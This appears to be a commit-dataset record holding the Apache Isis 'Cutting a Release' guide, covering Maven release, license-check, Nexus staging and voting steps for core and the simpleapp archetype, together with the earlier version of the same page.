ISISDEV=1.15.0-SNAPSHOT\nexport ISISREL=1.14.0\nexport ISISRC=RC1\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISJIRA=ISIS-9999 # <2>\nexport CATALINA_HOME=\/c\/java\/apache-tomcat-8.0.30 # <3>\n\nenv | grep ISIS | sort\n----\n<1> adjust by platform\n<2> set to an \"umbrella\" ticket for all release activities. 
(One should exist already, xref:cgcom.adoc#_cgcom_post-release-successful_update-jira_create-new-jira[created at] the beginning of the development cycle now completing).\n<3> adjust as required (Tomcat is used to smoke test the simpleapp archetype)\n\nObviously, alter `$ISISDEV` and `$ISISREL` as required, and bump `$ISISRC` for re-releasing following an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] releases.\n\n[IMPORTANT]\n====\nNote that the branch name is *not* the same any of the eventual tag names (eg `isis-1.14.0` or `simpleapp-archetype-1.14.0`).\n\nIf they did have the same name, then what would happen is that the `maven-release-plugin` would checkout the (HEAD of the) branch and thus upload a SNAPSHOT to the snapshot repository. What it should of course do is checkout the tag and then upload that to the release staging repository.\n====\n\n\n\n[[_cgcom_cutting-a-release_pull-down-code-to-release]]\n== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released. This will usually be the tip of the origin's `master` branch. Then, create a release branch for the version number being released; eg:\n\n[source,bash]\n----\ngit checkout master\ngit pull --ff-only\ngit checkout -b $ISISBRANCH\n----\n\nAll release preparation is done locally; if we are successful, this branch will be merged back into master.\n\n\nDouble check that the version number of the parent pom should reflect the branch name that you are now on (with a `-SNAPSHOT` suffix). his will normally have been done already during earlier development; but confirm that it has been updated. If it has not, make the change.\n\nDouble check that the version number of the core POM (`core\/pom.xml`) should reflect the branch name that you are now on. For example, if releasing version `1.14.0`, the POM should read:\n\n[source,xml]\n----\n<groupId>org.apache.isis.core<\/groupId>\n<artifactId>isis<\/artifactId>\n<version>1.14.0-SNAPSHOT<\/version>\n----\n\nAlso, check that there are no snapshot dependencies:\n\n[source,bash]\n----\ngrep SNAPSHOT `\/bin\/find . -name pom.xml | grep -v target | grep -v mothball | sort`\n----\n\nThe only mention of `SNAPSHOT` should be for the Isis modules about to be released.\n\n[TIP]\n====\nObviously, don't update Apache Isis' `SNAPSHOT` references; these get updated by the `mvn release:prepare` command we run later.\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core]]\n== Releasing Core\n\nFirst, we release `core`. Switch to the appropriate directory:\n\n[source,bash]\n----\ncd core\n----\n\n[[_cgcom_cutting-a-release_releasing-core_set-environment-variables]]\n=== Set environment variables\n\nSet additional environment variables for the core \"artifact\":\n\n[source,bash]\n----\nexport ISISART=isis\nexport ISISCOR=\"Y\"\n\nenv | grep ISIS | sort\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_license-headers]]\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files. The parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . 
-name rat.txt -print`; do grep '!AL' $a; done\n----\n\nwhere `rat.numUnapprovedLicenses` property is set to a high figure, temporarily overriding the default value of 0. This will allow the command to run over all submodules, rather than failing after the first one. The command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`. The `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nTo add missing headers, use the groovy script `addmissinglicenses.groovy` (in the `scripts` directory) to automatically insert missing headers for certain file types. The actual files checked are those with extensions specified in the line `def fileEndings = [".java", ".htm"]`:\n\n[source,bash]\n----\ngroovy ..\/scripts\/addmissinglicenses.groovy -x\n----\n\n(If the `-x` is omitted then the script is run in \"dry run\" mode). Once you've fixed all issues, confirm once more that `apache-rat-plugin` no longer reports any license violations, this time leaving the `rat.numUnapprovedLicenses` property to its default, 0:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=0 -o && \\\nfor a in `find . -name rat.txt -print`; do grep '!???' $a; done\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_missing-license-check]]\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information. Without appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`. This is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nTo capture the missing license information, use:\n\n[source,bash]\n----\nmvn license:download-licenses && \\\ngroovy ..\/scripts\/checkmissinglicenses.groovy\n----\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module. The script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_commit-changes]]\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash]\n----\ngit commit -am \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_sanity-check]]\n=== Sanity check\n\nPerform one last sanity check on the codebase. 
\n\n[[_cgcom_cutting-a-release_releasing-core_commit-changes]]\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash]\n----\ngit commit -am \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_sanity-check]]\n=== Sanity check\n\nPerform one last sanity check on the codebase. Delete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-dry-run]]\n=== Release prepare \"dry run\"\n\nMost of the work is done using the `mvn release:prepare` goal. Since this makes a lot of changes, we run it first in \"dry run\" mode; only if that works do we run the goal for real.\n\nRun the dry-run as follows:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D dryRun=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\nYou may be prompted for the gpg passphrase.\n\n[NOTE]\n====\nExperiments in using `--batch-mode -Dgpg.passphrase="..."` to fully automate this didn't work; for more info, see http:\/\/maven.apache.org\/plugins\/maven-gpg-plugin\/sign-mojo.html[here] (maven gpg plugin docs) and http:\/\/maven.apache.org\/maven-release\/maven-release-plugin\/examples\/non-interactive-release.html[here] (maven release plugin docs).\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-proper]]\n=== Release prepare \"proper\"\n\nAssuming this completes successfully, re-run the command, but without the `dryRun` flag and specifying `resume=false` (to ignore the `release.properties` file that gets generated as a side-effect of using `git`). You can also set the `skipTests` flag since the tests will have been run during the previous dry run:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D resume=false -DskipTests=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\n\n[TIP]\n====\nIf there are any snags at this stage, then explicitly delete the generated `release.properties` file first before trying again.\n====\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nYou should end up with artifacts in your local repo with the new version (eg `1.14.0`). This is a good time to do some quick sanity checks; nothing has yet been uploaded:\n\n* Unzip the source-release ZIP and check that it builds.\n* Inspect the `DEPENDENCIES` file, and check that it looks correct.\n\nThese steps can be performed using the following script:\n\n[source]\n----\nrm -rf $ISISTMP\/$ISISART-$ISISREL\nmkdir $ISISTMP\/$ISISART-$ISISREL\n\nif [ \"$ISISCOR\" == \"Y\" ]; then\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/core\/$ISISART\/$ISISREL\"\nelse\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/$ISISCPT\/$ISISART\/$ISISREL\"\nfi\necho \"cp \\\"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\\\" $ISISTMP\/$ISISART-$ISISREL\/.\"\ncp \"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\" $ISISTMP\/$ISISART-$ISISREL\/.\n\npushd $ISISTMP\/$ISISART-$ISISREL\nunzip $ISISART-$ISISREL-source-release.zip\n\ncd $ISISART-$ISISREL\nmvn clean install\n\ncat DEPENDENCIES\n\npopd\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-perform-upload]]\n=== Release perform (Upload)\n\nOnce the release has been built locally, it should be uploaded for voting. This is done by deploying the Maven artifacts to a staging directory (this includes the source release ZIP file, which is what will be voted upon).\n\nThe Apache staging repository runs on a Nexus server, hosted at https:\/\/repository.apache.org[repository.apache.org]. 
The process of uploading will create a staging repository that is associated with the host (IP address) performing the release. Once the repository is staged, the newly created staging repository is \"closed\" in order to make it available to others.\n\nUse:\n\n[source,bash]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/$ISISART-$ISISREL\/checkout\n----\n\nThe custom `workingDirectory` prevents file path issues if releasing on Windows. The command checks out the codebase from the tag, then builds the artifacts, then uploads them to the Apache staging repository:\n\n[source,bash]\n----\n...\n[INFO] --- maven-release-plugin:2.3.2:perform (default-cli) @ isis ---\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\\co\nre\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw\\core C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Executing: cmd.exe \/X \/C \"git ls-remote file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\n[INFO] Executing: cmd.exe \/X \/C \"git fetch file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git checkout release-1.14.0\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git ls-files\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Invoking perform goals in directory C:\\APACHE\\isis-git-rw\\core\\target\\checkout\\core\n[INFO] Executing goals 'deploy'...\n...\n----\n\nYou may (again) be prompted for gpg passphrase. All being well this command will complete successfully. 
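\n\nOnce the upload has finished and the staging repository has later been closed (see the Check\/Close Staging Repo section below), it can be worth spot-checking one staged file and its signature. The following is only a sketch; the `orgapacheisis-10xx` repo id is a placeholder, exactly as in the voting email further down:\n\n[source,bash]\n----\n# download a staged artifact plus its detached signature, then verify\ncurl -O https:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/$ISISREL\/isis-$ISISREL-source-release.zip\ncurl -O https:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/$ISISREL\/isis-$ISISREL-source-release.zip.asc\ngpg --verify isis-$ISISREL-source-release.zip.asc isis-$ISISREL-source-release.zip\n----\n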
\nNote that, since it is uploading code artifacts, the `release:perform` command could take a while to complete.\n\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype]]\n== Releasing the Archetype\n\nApache Isis archetypes are reverse engineered from example applications.\nOnce reverse engineered, the source is checked into git (replacing any earlier version of the archetype) and released.\n\n\n[NOTE]\n====\nIf releasing using Windows and Maven >= 3.3.3, then there is an issue that requires a small workaround.\n\nIn Maven 3.3.3 the `mvn.bat` file was removed, replaced instead with `mvn.cmd`.\nHowever, `maven-archetype-plugin:2.4` only uses `mvn.bat`; this causes the `archetype:create-from-project` goal to fail.\nThe fix is simple: just copy `mvn.cmd` to `mvn.bat`.\n====\n\n\nSwitch to the directory containing the `simpleapp` example:\n\n[source,bash]\n----\ncd ..\/example\/application\/simpleapp\n----\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_setup-environment-variables]]\n=== Setup environment variables\n\nSet additional environment variables for the `simpleapp-archetype` artifact:\n\n[source,bash]\n----\nexport ISISART=simpleapp-archetype\nexport ISISPAR=$ISISREL # <1>\n\nexport ISISCPT=$(echo $ISISART | cut -d- -f2)\nexport ISISCPN=$(echo $ISISART | cut -d- -f1)\n\nenv | grep ISIS | sort\n----\n<1> `$ISISPAR` is the version of the Apache Isis core that will act as the archetype's parent. Usually this is the same as `$ISISREL`.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_check-the-example-app]]\n=== Check the example app\n\nUpdate the parent `pom.xml` to reference the _released_ version of Apache Isis core, eg:\n\n[source,xml]\n----\n<properties>\n <isis.version>1.14.0<\/isis.version>\n ...\n<\/properties>\n----\n\n\n\nCheck for and fix any missing license header notices:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done\n----\n\n\nFinally, double check that the app\n\n* builds:\n+\n[source,bash]\n----\nmvn clean install\n----\n\n* can be run from an IDE\n** mainClass=`org.apache.isis.WebServer`\n** args=`-m domainapp.app.DomainAppAppManifestWithFixtures`\n\n* can be run using the mvn jetty plugin:\n+\n[source,bash]\n----\npushd webapp\nmvn jetty:run\npopd\n----\n\n* can be deployed as a WAR\n+\n[source,bash]\n----\ncp webapp\/target\/simpleapp.war $CATALINA_HOME\/webapps\/ROOT.war\npushd $CATALINA_HOME\/bin\nsh startup.sh\ntail -f ..\/logs\/catalina.out\n----\n+\nquit using:\n+\n[source,bash]\n----\nsh shutdown.sh\npopd\n----\n\nIn each case, check the about page and confirm that the app has been built against non-SNAPSHOT versions of the Apache Isis jars.\n
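\nA quick command-line way to double-check that last point for the WAR (a sketch; run from the `simpleapp` directory after building):\n\n[source,bash]\n----\n# list the jars packaged in the WAR and flag any SNAPSHOT versions\nunzip -l webapp\/target\/simpleapp.war | grep -i snapshot \\\n&& echo \"SNAPSHOT jars found - fix before releasing\" \\\n|| echo \"ok: no SNAPSHOT jars\"\n----\n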
\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_create-the-archetype]]\n=== Create the archetype\n\nMake sure you are in the correct directory and that the environment variables are correct.\n\nTo recreate the *simpleapp* archetype:\n\n[source,bash]\n----\ncd example\/application\/simpleapp\nenv | grep ISIS | sort\n----\n\nThen, run the script:\n\n[source,bash]\n----\nsh ..\/..\/..\/scripts\/recreate-archetype.sh $ISISJIRA\n----\n\nThe script automatically commits changes; if you wish, use `git log` and\n`git diff` (or a tool such as SourceTree) to review the changes made.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-prepare]]\n=== Release prepare\n\nSwitch to the *archetype* directory and execute `release:prepare`:\n\n[source]\n----\ncd ..\/..\/..\/example\/archetype\/$ISISCPN\nrm -rf $ISISTMP\/checkout\nmvn release:prepare -P apache-release \\\n -DreleaseVersion=$ISISREL \\\n -DdevelopmentVersion=$ISISDEV \\\n -Dtag=$ISISART-$ISISREL\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nThis is a good point to test the archetype; nothing has yet been uploaded.\n\n_In a different session_, create a new app from the archetype. 
First set up environment variables:\n\n[source,bash]\n----\nexport ISISTMP=\/c\/tmp # or as required\nexport ISISCPN=simpleapp\nenv | grep ISIS | sort\n----\n\nThen generate a new app from the archetype:\n\n[source,bash]\n----\nrm -rf $ISISTMP\/test-$ISISCPN\n\nmkdir $ISISTMP\/test-$ISISCPN\ncd $ISISTMP\/test-$ISISCPN\nmvn archetype:generate \\\n -D archetypeCatalog=local \\\n -D groupId=com.mycompany \\\n -D artifactId=myapp \\\n -D archetypeGroupId=org.apache.isis.archetype \\\n -D archetypeArtifactId=$ISISCPN-archetype\n----\n\nBuild the newly generated app and test:\n\n[source,bash]\n----\ncd myapp\nmvn clean install\ncd webapp\nmvn jetty:run # runs as mvn jetty plugin\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-perform-upload]]\n=== Release Perform (upload)\n\nBack in the original session (in the *archetype* directory, `example\/archetype\/$ISISCPN`), execute `release:perform`:\n\n[source]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/checkout\n----\n\nThis will upload the artifacts to the ASF Nexus repository.\n\n\n[[_cgcom_cutting-a-release_check-close-staging-repo]]\n== Check\/Close Staging Repo\n\nThe `mvn release:perform` commands will have put release artifacts for both `core` and the `simpleapp` archetype into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::{_imagesdir}release-process\/nexus-staging-0.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-0.png\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::{_imagesdir}release-process\/nexus-staging-1.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-1.png\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread. In the screenshot above the id is `org.apache.isis-008`.\n\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository. This will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::{_imagesdir}release-process\/nexus-staging-2.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2.png\"]\n\nNexus should start the process of closing the repository.\n\nimage::{_imagesdir}release-process\/nexus-staging-2a.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2a.png\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::{_imagesdir}release-process\/nexus-staging-3.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-3.png\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::{_imagesdir}release-process\/nexus-staging-4.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-4.png\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing. 
See xref:cgcom.adoc#_cgcom_key-generation[Key Generation] for more details.\n====\n\n\n\n[[_cgcom_cutting-a-release_push-branches]]\n== Push branches\n\nPush the release branch to origin:\n\n[source,bash]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tags for both core and the archetype:\n\n[source]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit push origin refs\/tags\/simpleapp-archetype-$ISISREL:refs\/tags\/simpleapp-archetype-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tag isn't visible locally but can be seen https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=summary[online].\n====\n\n\n\n[[_cgcom_cutting-a-release_voting]]\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n[[_cgcom_cutting-a-release_voting-start-voting-thread]]\n=== Start voting thread on link:mailto:dev@isis.apache.org[dev@isis.apache.org]\n\nThe following boilerplate is for a release of the Apache Isis Core. Adapt as required:\n\nUse the following subject, eg:\n\n[source,bash]\n----\n[VOTE] Apache Isis Core release 1.14.0 RC1\n----\n\nAnd use the following body:\n\n[source,bash]\n----\nI've cut a release for Apache Isis Core and the simpleapp archetype:\n\n* Core 1.14.0\n* SimpleApp Archetype 1.14.0\n\nThe source code artifacts have been uploaded to staging repositories on repository.apache.org:\n\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/1.14.0\/isis-1.14.0-source-release.zip\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/archetype\/simpleapp-archetype\/1.14.0\/simpleapp-archetype-1.14.0-source-release.zip\n\nFor each zip there is a corresponding signature file (append .asc to the zip's url).\n\nIn the source code repo the code has been tagged as isis-1.14.0-RC1 and simpleapp-archetype-1.14.0-RC1; see https:\/\/git-wip-us.apache.org\/repos\/asf?p=isis.git\n\nFor instructions on how to verify the release (build from binaries and\/or use in Maven directly), see http:\/\/isis.apache.org\/guides\/cgcom.html#_cgcom_verifying-releases\n\nPlease verify the release and cast your vote. The vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (1.14.0 or whatever)\n* the release candidate number (`RC1` or whatever)\n* the repository id, as provided by Nexus earlier (`orgapacheisis-10xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:cgcom.adoc#_cgcom_verifying-releases[verify the release].\n\n\n\n\n","old_contents":"[[_cgcom_cutting-a-release]]\n= Cutting a Release\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. 
see the license for the specific language governing permissions and limitations under the license.\n:_basedir: ..\/\n:_imagesdir: images\/\n:toc: right\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:cgcom.adoc#_cgcom_verifying-releases[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:cgcom.adoc#_cgcom_post-release-successful[successful] or an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] vote.\n\nApache Isis itself consists of two separately releasable modules; relative to the link:https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=tree[source code root] there are:\n\n* `core`\n* `component\/example\/archetypes\/simpleapp`\n\nThis section details the process for formally releasing Isis modules. It describes the process for both `core` and then the archetype. The subsequent sections describe how other committers can xref:cgcom.adoc#_cgcom_verifying-releases[verify a release] and how the release manager can then perform xref:cgcom.adoc#_cgcom_post-release[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:cgcom.adoc#_cgcom_release-process-prereqs[prerequisites] that must be configured first. In particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools. They should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n\n\n[[_cgcom_cutting-a-release_obtain-consensus]]\n== Obtain Consensus\n\nBefore releasing `core`, ensure there is consensus on the link:..\/support.html[dev mailing list] that this is the right time for a release. The discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released. This should be in line with our xref:cgcom.adoc#_cgcom_versioning-policy[semantic versioning policy].\n\n\nMake sure you have a JIRA ticket open against which to perform all commits. In most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n\n[[_cgcom_cutting-a-release_set-environment-variables]]\n== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible. For example:\n\n[source,bash]\n----\ncd core\nexport ISISTMP=\/c\/tmp # <1>\nexport ISISDEV=1.15.0-SNAPSHOT\nexport ISISREL=1.14.0\nexport ISISRC=RC1\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISJIRA=ISIS-9999 # <2>\nexport CATALINA_HOME=\/c\/java\/apache-tomcat-8.0.30 # <3>\n\nenv | grep ISIS | sort\n----\n<1> adjust by platform\n<2> set to an \"umbrella\" ticket for all release activities. 
(One should exist already, xref:cgcom.adoc#_cgcom_post-release-successful_update-jira_create-new-jira[created at] the beginning of the development cycle now completing).\n<3> adjust as required (Tomcat is used to smoke test the simpleapp archetype)\n\nObviously, alter `$ISISDEV` and `$ISISREL` as required, and bump `$ISISRC` for re-releasing following an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] releases.\n\n[IMPORTANT]\n====\nNote that the branch name is *not* the same any of the eventual tag names (eg `isis-1.14.0` or `simpleapp-archetype-1.14.0`).\n\nIf they did have the same name, then what would happen is that the `maven-release-plugin` would checkout the (HEAD of the) branch and thus upload a SNAPSHOT to the snapshot repository. What it should of course do is checkout the tag and then upload that to the release staging repository.\n====\n\n\n\n[[_cgcom_cutting-a-release_pull-down-code-to-release]]\n== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released. This will usually be the tip of the origin's `master` branch. Then, create a release branch for the version number being released; eg:\n\n[source,bash]\n----\ngit checkout master\ngit pull --ff-only\ngit checkout -b $ISISBRANCH\n----\n\nAll release preparation is done locally; if we are successful, this branch will be merged back into master.\n\n\nDouble check that the version number of the parent pom should reflect the branch name that you are now on (with a `-SNAPSHOT` suffix). his will normally have been done already during earlier development; but confirm that it has been updated. If it has not, make the change.\n\nDouble check that the version number of the core POM (`core\/pom.xml`) should reflect the branch name that you are now on. For example, if releasing version `1.14.0`, the POM should read:\n\n[source,xml]\n----\n<groupId>org.apache.isis.core<\/groupId>\n<artifactId>isis<\/artifactId>\n<version>1.14.0-SNAPSHOT<\/version>\n----\n\nAlso, check that there are no snapshot dependencies:\n\n[source,bash]\n----\ngrep SNAPSHOT `\/bin\/find . -name pom.xml | grep -v target | grep -v mothball | sort`\n----\n\nThe only mention of `SNAPSHOT` should be for the Isis modules about to be released.\n\n[TIP]\n====\nObviously, don't update Apache Isis' `SNAPSHOT` references; these get updated by the `mvn release:prepare` command we run later.\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core]]\n== Releasing Core\n\nFirst, we release `core`. Switch to the appropriate directory:\n\n[source,bash]\n----\ncd core\n----\n\n[[_cgcom_cutting-a-release_releasing-core_set-environment-variables]]\n=== Set environment variables\n\nSet additional environment variables for the core \"artifact\":\n\n[source,bash]\n----\nexport ISISART=isis\nexport ISISCOR=\"Y\"\n\nenv | grep ISIS | sort\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_license-headers]]\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files. The parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . 
-name rat.txt -print`; do grep '!AL' $a; done\n----\n\nwhere `rat.numUnapprovedLicenses` property is set to a high figure, temporarily overriding the default value of 0. This will allow the command to run over all submodules, rather than failing after the first one. The command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`. The `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nTo add missing headers, use the groovy script `addmissinglicenses.groovy` (in the `scripts` directory) to automatically insert missing headers for certain file types. The actual files checked are those with extensions specified in the line `def fileEndings = [".java", ".htm"]`:\n\n[source,bash]\n----\ngroovy ..\/scripts\/addmissinglicenses.groovy -x\n----\n\n(If the `-x` is omitted then the script is run in \"dry run\" mode). Once you've fixed all issues, confirm once more that `apache-rat-plugin` no longer reports any license violations, this time leaving the `rat.numUnapprovedLicenses` property to its default, 0:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=0 -o && \\\nfor a in `find . -name rat.txt -print`; do grep '!???' $a; done\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_missing-license-check]]\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information. Without appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`. 